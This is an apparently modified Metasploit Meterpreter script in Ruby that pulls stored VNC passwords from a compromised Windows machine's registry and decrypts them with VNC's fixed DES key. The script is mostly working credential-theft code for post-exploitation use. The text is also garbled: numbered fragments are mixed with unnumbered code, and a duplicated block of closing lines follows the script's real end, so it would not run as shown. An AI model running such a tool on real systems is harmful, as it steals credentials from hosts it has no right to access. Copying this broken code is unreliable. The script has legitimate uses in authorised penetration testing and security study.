

##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
#----------------------------------------------------------------
# Meterpreter script to obtain the VNC password out of the
# registry and print its decoded cleartext
#
# by Kurt Grutzmacher <grutz@jingojango.net>
#
# rev history
# -----------
# 1.0 - 9/24/9 - Initial release
#----------------------------------------------------------------
require 'rex/proto/rfb/cipher'

# The Meterpreter session this script operates on (the script's `client`).
session = client

# Switches accepted on the script's command line. For each entry the first
# element says whether the switch takes a value, the second is its help text.
option_table = {
  "-h" => [ false, "Help menu."],
  "-k" => [ true, "Specific registry key to search (minus Password)."],
  "-l" => [ false, "List default key locations"]
}
@@exec_opts = Rex::Parser::Arguments.new(option_table)
  23. def usage()
  24. print("\nPull the VNC Password from a Windows Meterpreter session\n")
  25. print("By default an internal list of keys will be searched.\n\n")
  26. print("\t-k\tSpecific key to search (e.g. HKLM\\\\Software\\\\ORL\\\\WinVNC3\\\\Default)\n")
  27. print("\t-l\tList default key locations\n\n")
  28. completed
  29. end
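# Read the 'Password' value under a registry key on the session's host.
#
# Any failure along the way (malformed key path, key absent, access denied,
# value missing) yields nil so that callers iterating a list of candidate
# keys simply move on. The original only guarded query_value; a missing key
# raised out of open_key and aborted the whole search, and the opened key
# handle was never released.
#
# @param session [Object] Meterpreter session exposing sys.registry
# @param key [String] full registry path, e.g. 'HKLM\\Software\\ORL\\WinVNC3'
# @return [Object, nil] the registry value object (with #data), or nil
def get_vncpw(session, key)
  open_key = nil
  root_key, base_key = session.sys.registry.splitkey(key)
  open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
  open_key.query_value('Password')
rescue
  # no registry key / value found, or other error: treat as "nothing here"
  nil
ensure
  # release the remote handle whether or not the value was found
  open_key.close if open_key
end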
# Print the registry locations that are searched by default, one per line,
# then end the script via `completed`.
#
# @param keys [Array<String>] registry key paths to list
def listkeylocations(keys)
  print_line("\nVNC Registry Key Locations")
  print_line("--------------------------\n")
  keys.map { |location| "\t#{location}" }.each { |line| print_line(line) }
  completed
end
# fixed des key
# Because the key is constant, the stored registry value is reversible by
# anyone who can read it; it is an obfuscation, not a hash.
fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
# 5A B2 CD C0 BA DC AF 13

# some common places for VNC password hashes: each subkey is looked up under
# both the machine hive (HKLM) and the current-user hive (HKCU), in that order
vnc_subkeys = [
  'Software\\ORL\\WinVNC3',
  'Software\\ORL\\WinVNC3\\Default',
  'Software\\ORL\\WinVNC\\Default',
  'Software\\RealVNC\\WinVNC4',
  'Software\\RealVNC\\Default',
]
keys = vnc_subkeys.flat_map { |subkey| ["HKLM\\#{subkey}", "HKCU\\#{subkey}"] }
# parse the command line
listkeylocs = false # NOTE(review): assigned here but not read anywhere in the visible script
keytosearch = nil
# usage and listkeylocations both finish with `completed`, so -h and -l do
# not fall through to the search below (assuming `completed` ends the script).
@@exec_opts.parse(args) do |opt, _idx, val|
  case opt
  when "-h" then usage
  when "-l" then listkeylocations(keys)
  when "-k" then keytosearch = val
  end
end
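# Decode one recovered 'Password' value and report it. The value is
# decrypted with the fixed DES key rather than being a hash, so whoever can
# read the registry value can recover the cleartext.
#
# @param key [String] registry key the value was read from (for the report)
# @param vncpw [Object] registry value object exposing #data (raw bytes)
# @param fixedkey [String] the 8-byte fixed DES key
def report_vncpw(key, vncpw, fixedkey)
  # Array#to_s on the unpack result renders as '["..."]' on Ruby 1.9+;
  # take the single hex string instead.
  vncpw_hextext = vncpw.data.unpack("H*").first
  vncpw_text = Rex::Proto::RFB::Cipher.decrypt(vncpw.data, fixedkey)
  print_status("FOUND in #{key} -=> #{vncpw_hextext} => #{vncpw_text}")
end

if client.platform == 'windows'
  if keytosearch.nil?
    print_status("Searching for VNC Passwords in the registry....")
    found = false
    keys.each do |key|
      vncpw = get_vncpw(session, key)
      next unless vncpw
      report_vncpw(key, vncpw, fixedkey)
      found = true
    end
    # mirror the single-key branch so a fruitless search is not silent
    print_status("Not found") unless found
  else
    print_status("Searching in regkey: #{keytosearch}")
    vncpw = get_vncpw(session, keytosearch)
    if vncpw
      report_vncpw(keytosearch, vncpw, fixedkey)
    else
      print_status("Not found")
    end
  end
else
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end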
  92. end
  93. end
  94. else
  95. print_error("This version of Meterpreter is not supported with this Script!")
  96. raise Rex::Script::Completed
  97. end